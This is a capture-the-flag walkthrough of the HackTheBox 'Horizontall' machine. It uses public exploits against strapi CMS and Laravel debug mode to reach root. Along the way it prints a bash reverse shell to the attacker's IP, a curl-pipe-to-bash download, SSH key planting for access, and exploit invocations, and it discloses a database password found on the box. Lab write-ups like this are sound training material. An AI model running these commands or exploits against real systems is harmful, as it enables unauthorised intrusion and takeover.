Horizontall HackTheBox WalkThrough
This is the Horizontall HackTheBox machine walkthrough. In this writeup I demonstrate, step by step, how I rooted the Horizontall HackTheBox machine. Before starting, let us know something about this box. It is a Linux box with the IP address 10.10.11.105 and a difficulty level of easy, as assigned by its maker.
First of all, connect your PC to the HackTheBox VPN and confirm your connectivity with the Horizontall machine by pinging its IP, 10.10.11.105. If all goes well, it is time to start hacking.
As usual, I started by scanning the machine. Scanning gives us an idea of how to proceed further: it helps in banner grabbing the services running on the different ports, and sometimes it helps with vulnerability assessment as well. I used nmap (a popular port scanner) for this task, and the result is given below:
$ sudo nmap -sC -sV -p- -oN full-port.nmap 10.10.11.105
The full port scan with nmap revealed ports 22 and 80 as open. OpenSSH 7.6p1 is running on port 22 and the nginx 1.14.0 web server is running on port 80. I googled for vulnerabilities in these OpenSSH and nginx versions but found nothing useful. Also, the nmap script http-title revealed a virtual host, horizontall.htb. So, before going any further with enumeration, let us add horizontall.htb to our hosts file, which is located at /etc/hosts.
Hosts File After Modification 1
$ cat /etc/hosts
On visiting the URL http://horizontall.htb/ I got a simple UI saying Build website using HT. After checking the source code and the other content on the website, I could not find any useful information.
So I moved on to directory and virtual host brute forcing. Directory brute forcing with dirsearch and the wordlist directory-list-2.3-medium.txt couldn't find any useful file or folder. But virtual host brute forcing with ffuf and the wordlist subdomains-top1million-110000.txt found a virtual host:
$ ffuf -w /opt/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -u http://horizontall.htb -H "Host: FUZZ.horizontall.htb" -mc 200 -c
Note that -mc 200 keeps only responses with HTTP status 200. If the default virtual host also answers every Host header with a 200, add a response-size filter (-fs with the size of the default page) so that only the genuinely different responses remain.
Let us add api-prod.horizontall.htb to our hosts file as well.
Hosts File After Modification 2
$ cat /etc/hosts
On going to the URL http://api-prod.horizontall.htb/ I found a simple page containing
Then I directory brute forced this subdomain using dirsearch and the same wordlist:
$ sudo dirsearch -u http://api-prod.horizontall.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e all -x 404,403,301,303 -t 100
Directory brute forcing revealed the /admin and /reviews pages. On going to http://api-prod.horizontall.htb/admin/ I found the login page of the strapi CMS.
Then I googled for the version of strapi CMS, the vulnerabilities associated with it, and how to find the version of strapi being used. Luckily, I found a link which shows how to find the strapi version. Following it, the URL http://api-prod.horizontall.htb/admin/strapiVersion revealed that the installed version of strapi is 3.0.0-beta.17.4.
A quick google for vulnerabilities in strapi CMS revealed that version 3.0.0-beta.17.4 is vulnerable to unauthenticated remote code execution and that a public exploit is available on Exploit-DB (50239). The exploit chains two flaws: the password-reset weakness (CVE-2019-18818), which lets it take over the admin account, and the command injection in the admin plugin-install endpoint (CVE-2019-19609), which gives command execution as the user running strapi.
Tip: whenever you get a software or framework version during the enumeration phase of any CTF, it is always a good idea to check the vulnerabilities associated with it.
To get remote code execution on the Horizontall machine, follow the steps below.
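Rather than eyeballing pre-release version strings, the check can be scripted. The following Python is an added example, not code from the original walkthrough or from strapi: it parses the JSON body that GET /admin/strapiVersion returns and compares it, with proper semver pre-release ordering, against the first fixed releases of the two flaws the Exploit-DB 50239 chain relies on (the thresholds are assumptions taken from the public advisories for CVE-2019-18818 and CVE-2019-19609; the response body is constructed here). It handles the case a plain string comparison gets wrong: beta.9 sorts before beta.17, and a final 3.0.0 sorts after every beta.

```python
import json
import re

# Response body as returned by GET /admin/strapiVersion on the target.
# Constructed for this example; the value matches what the box reported.
SAMPLE_RESPONSE = '{"strapiVersion":"3.0.0-beta.17.4"}'

# First fixed release for each flaw the Exploit-DB 50239 chain relies on.
# Assumption: taken from the public advisories; re-check them before relying on this.
FIXED_IN = {
    "CVE-2019-18818 (password reset)": "3.0.0-beta.17.5",
    "CVE-2019-19609 (plugin install command injection)": "3.0.0-beta.17.8",
}

_VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)(?:-([0-9A-Za-z.-]+))?$")


def parse_version(version):
    """Turn '3.0.0-beta.17.4' into a tuple that sorts by semver precedence.

    Layout: (major, minor, patch, is_release, prerelease_ids).
    is_release is 0 for a pre-release and 1 for a final release, so
    3.0.0-beta.17.8 < 3.0.0.  Pre-release identifiers are compared
    numerically when they are all digits ('9' < '17') and as strings
    otherwise, with numeric identifiers ranking below alphanumeric ones,
    as the semver specification requires.
    """
    m = _VERSION_RE.match(version)
    if not m:
        raise ValueError(f"unparsable version string: {version!r}")
    core = tuple(int(x) for x in m.group(1, 2, 3))
    pre = m.group(4)
    if pre is None:
        return core + (1, ())
    ids = tuple((0, int(p)) if p.isdigit() else (1, p) for p in pre.split("."))
    return core + (0, ids)


def is_vulnerable(version, fixed_in):
    """True when `version` predates the first fixed release."""
    return parse_version(version) < parse_version(fixed_in)


def check_strapi(response_body):
    """Map each known flaw to whether the reported strapi version is affected."""
    version = json.loads(response_body)["strapiVersion"]
    return {cve: is_vulnerable(version, fixed) for cve, fixed in FIXED_IN.items()}


if __name__ == "__main__":
    for cve, affected in check_strapi(SAMPLE_RESPONSE).items():
        print(f"{cve}: {'VULNERABLE' if affected else 'patched'}")
```

Feed it the body of a real request (for example the output of curl against the strapiVersion endpoint) instead of SAMPLE_RESPONSE; the same parser works for any project that publishes semver-style pre-release strings.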
$ wget https://www.exploit-db.com/download/50239 -O exploit.py
$ python3 exploit.py http://api-prod.horizontall.htb
After successful exploitation we get an authenticated JSON Web Token and the admin credentials (the exploit resets the admin password). We can use these credentials to log in at http://api-prod.horizontall.htb/admin/. Since this is a blind RCE, the output of the commands we run is not returned on screen, as the screenshot above shows.
Checking Connectivity with Kali Machine
To confirm whether we can get a reverse shell to our Kali machine, we first need to check that the Horizontall machine can reach it. I pinged my Kali box from the Horizontall machine through the exploit's command prompt while capturing ICMP on tun0 with tcpdump, and the pings arrived.
On Horizontall Machine
$> ping -c 3 10.10.16.7
On Kali Machine
$ sudo tcpdump -i tun0 icmp
Now it is time to get a reverse shell using a one-liner. You can get a list of one-liners from this link.
Getting User Shell
To get a reverse shell, follow the given steps:
On Kali Machine
In window 1
$ echo '#!/bin/bash' > shell.sh
$ echo 'bash -i >& /dev/tcp/10.10.16.7/9001 0>&1' >> shell.sh # Don't forget to replace the IP with your Kali machine's IP
$ cat shell.sh
$ sudo python3 -m http.server 80
In window 2
$ nc -nvlp 9001
On Horizontall Machine
$> curl http://10.10.16.7/shell.sh | bash
Back in window 2, once the shell connects:
$ whoami && id
We have successfully got a user shell, running as the strapi user. Let us upgrade it to a fully interactive TTY so that we can run more advanced commands through it.
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
$ CTRL + Z # to background the shell
$ stty raw -echo
$ fg # then press enter twice to foreground the shell
$ export TERM=xterm-256color
$ stty -a | head -n1 # run this in a local Kali terminal to read your own rows/columns
$ stty rows 43 columns 174 # then set the same size inside the reverse shell
Capture User Flag
$ cat /home/developer/user.txt
To escalate privileges to root we first have to find a privilege escalation vector. We can find a PrivEsc vector either manually or using post-exploitation enumeration scripts like linpeas.sh, LinEnum.sh and many more. This time I went for manual enumeration.
Finding PrivEsc Vector
The $ ss -lnpt command revealed that ports 1337, 3306 and 8000 are listening on localhost only. There must be some services running over them.
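When a box has several loopback-only listeners it helps to pick them out mechanically. The Python below is an added example, not part of the walkthrough or of any tool it uses: it parses `ss -lnpt` output (a constructed sample carrying the walkthrough's ports; the pid and process name are made up), reports only the ports that are bound exclusively to loopback addresses, and builds the matching `ssh -L` argument list for forwarding them to Kali (the user name and target IP are the walkthrough's).

```python
import ipaddress
import re

# Output of `ss -lnpt` as seen from an unprivileged shell on the box.
# Constructed for this example: the ports match the walkthrough, the pid and
# process name are made up (ss only shows process info for your own sockets).
SAMPLE_SS = """\
State   Recv-Q  Send-Q  Local Address:Port   Peer Address:Port  Process
LISTEN  0       128     0.0.0.0:22           0.0.0.0:*
LISTEN  0       80      127.0.0.1:3306       0.0.0.0:*
LISTEN  0       128     127.0.0.1:8000       0.0.0.0:*
LISTEN  0       128     127.0.0.1:1337       0.0.0.0:*          users:(("node",pid=1678,fd=32))
LISTEN  0       128     0.0.0.0:80           0.0.0.0:*
LISTEN  0       128     [::]:22              [::]:*
LISTEN  0       128     [::]:80              [::]:*
"""

_PROC_RE = re.compile(r'users:\(\("([^"]+)",pid=(\d+)')


def parse_ss(output):
    """Return [(address, port, process_name_or_None)] for every LISTEN row."""
    rows = []
    for line in output.splitlines():
        parts = line.split()
        if len(parts) < 5 or parts[0] != "LISTEN":
            continue  # header line or a non-listening socket
        host, _, port = parts[3].rpartition(":")  # rpartition copes with IPv6 colons
        m = _PROC_RE.search(line)
        rows.append((host.strip("[]"), int(port), m.group(1) if m else None))
    return rows


def _bind_kind(host):
    """Classify a bind address as 'any', 'loopback' or 'other'."""
    if host in ("*", ""):
        return "any"
    ip = ipaddress.ip_address(host.split("%")[0])  # drop an IPv6 scope id such as %eth0
    if ip.is_loopback:
        return "loopback"
    if ip.is_unspecified:  # 0.0.0.0 or ::
        return "any"
    return "other"


def local_only_ports(output):
    """Ports that are only reachable from the box itself, as (port, process) pairs.

    A port counts as local-only when every socket listening on it is bound to
    a loopback address.  A port that is also bound on 0.0.0.0 or [::] (as 22
    and 80 are above) is already reachable from outside and needs no forward.
    """
    by_port = {}
    for host, port, proc in parse_ss(output):
        info = by_port.setdefault(port, {"kinds": set(), "proc": None})
        info["kinds"].add(_bind_kind(host))
        if proc:
            info["proc"] = proc
    return sorted(
        (port, info["proc"])
        for port, info in by_port.items()
        if info["kinds"] == {"loopback"}
    )


def ssh_forward_args(ports, target, user="strapi"):
    """Build the `ssh -L` argument list that exposes each local-only port on the attacker's box."""
    args = ["ssh"]
    for port in ports:
        args += ["-L", f"{port}:127.0.0.1:{port}"]
    return args + [f"{user}@{target}"]


if __name__ == "__main__":
    found = local_only_ports(SAMPLE_SS)
    for port, proc in found:
        print(f"127.0.0.1:{port}  process={proc or 'unknown (not our socket)'}")
    print(" ".join(ssh_forward_args([p for p, _ in found], "10.10.11.105")))
```

Pipe the real output in with something like `ss -lnpt | python3 script.py` after replacing SAMPLE_SS with `sys.stdin.read()`; the IPv6 handling matters because a service bound to [::1] is just as local-only as one bound to 127.0.0.1.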
A MySQL server is running on port 3306. I tried to log in to it using the credential #J!:F9Zt2uI, which I got from the file database.json in the directory /opt/strapi/myapi/config/environments/development/. But there was no useful information in the databases.
When I tried to access port 1337 it didn't respond. After accessing the service on port 8000 through the URL http://127.0.0.1:8000, I found that the application running there is built with Laravel:
$ curl http://127.0.0.1:8000 | grep -A3 -B4 -i "Laravel v8"
As soon as I had the information about Laravel, I searched for vulnerabilities and exploits. After some research I found that Laravel (<= v8.4.2) is vulnerable to remote code execution when debug mode is enabled; the flaw is in the Ignition error page that ships with it. For more info about this vulnerability check CVE-2021-3129. After checking the exploit at this URL I found that it downloads the phpggc library from GitHub while it runs. The exploit runs from the attacker's side, and a HackTheBox machine doesn't have access to the external Internet, so we can't execute it on the Horizontall machine itself. And since port 8000 is bound only to 127.0.0.1 on the target, we have to local port forward port 8000 to our Kali machine; only then can we run the exploit from Kali. Check the fifth line from the bottom in the screenshot below.
We will use SSH for local port forwarding. But we don't have any SSH credentials yet, so we need to create some. Since we have a shell as the strapi user, we can add our SSH public key from our id_rsa.pub file to the authorized_keys file of user strapi, and then connect to the Horizontall machine using the matching private key, id_rsa. So let us create an RSA key pair on Kali (if you don't already have one) and copy the public key:
On Kali Machine
$ cat ~/.ssh/id_rsa.pub
On Horizontall Machine
$ mkdir -p /opt/strapi/.ssh && chmod 700 /opt/strapi/.ssh # strapi's home directory is /opt/strapi; use the absolute path so the directory is not created under the shell's current working directory
$ echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDqvcT8ZYbpNsiqZ53qceUd1JbnaugzrTrdFJm1Jpfn0YBdcFxMM4SLuLEANZ5kUJWS147CAgAbe2ufJT7HOPi09jjB9d21DcfcsiZA7NJ9rJU0g1PWXwUm1WyZIgoRGh3cOw+JnnampekaowAJyIDWZnBjSUjoybBGL8EfjdDXXTxoim/b8RP6vpjwJYrTJiuWFNDyHeIej4WCklr3TwuiAy7KZ67mn8ICRpNpdbndPwWajJbHKe2Ua3KX/gnk5wJOF1tCxtdZQ4qFPwvg4I5ZirIQDsfJ/JoperybYknHMiAGoL2GagXzwBuj6jgoFRDzkRQ9sT5lYZ5GObAijWEuThL+VclpRGb+LreCy13fLCb3upRT7tZFx7KPB0oSgpWU/RLvffoeKweKoLdSD8eIjbI/mOdbnNJVqAz/8HrbvtfcIfmDFCB8XcS7YhpItZFq6wPLhNr+xJuutTbVZcAXCHP4aVEtKAX2Q29tmNBcAgfDa2cdcKQXFFlbWikufLE= [email protected]">/opt/strapi/.ssh/authorized_keys
$ chmod 600 /opt/strapi/.ssh/authorized_keys
$ cat /opt/strapi/.ssh/authorized_keys
We have successfully added our public key to the authorized_keys file of user strapi on Horizontall.
Local Port Forwarding
Let us log in to the strapi account over SSH using our id_rsa key and forward port 8000 to our Kali machine.
$ chmod 400 ~/.ssh/id_rsa
$ ssh -i ~/.ssh/id_rsa -L 8000:127.0.0.1:8000 strapi@10.10.11.105
We can check the forwarded port using the command
$ ss -lnpt
Now the service running on port 8000 of the Horizontall machine is reachable on port 8000 of our Kali machine, via the URL http://localhost:8000/.
When I tried to escalate privileges using this exploit, it worked straight away. So our PrivEsc vector is
Privilege Escalation by exploiting Vulnerable Software Version.
Note that this only yields root because the Laravel application on port 8000 runs as root; code execution through its debug page is therefore code execution as root.
Getting Root by Privilege Escalation
To perform privilege escalation, follow the steps given at this URL or follow the steps below.
$ git clone https://github.com/nth347/CVE-2021-3129_exploit.git
$ cd CVE-2021-3129_exploit
$ chmod +x exploit.py
$ ./exploit.py http://localhost:8000 Monolog/RCE1 id
We can clearly see that we have successfully escalated privileges to root, as the output of the id command is uid=0(root) gid=0(root) groups=0(root).
Capture Root Flag
Let us capture root flag.
$ ./exploit.py http://localhost:8000 Monolog/RCE1 'cat /root/root.txt'
This was how I rooted the Horizontall HackTheBox machine. I learnt a lot from this challenge and hope you have also learnt something new. Thanks for reading this walkthrough. For any query or suggestion about the walkthrough, feel free to write to us at [email protected]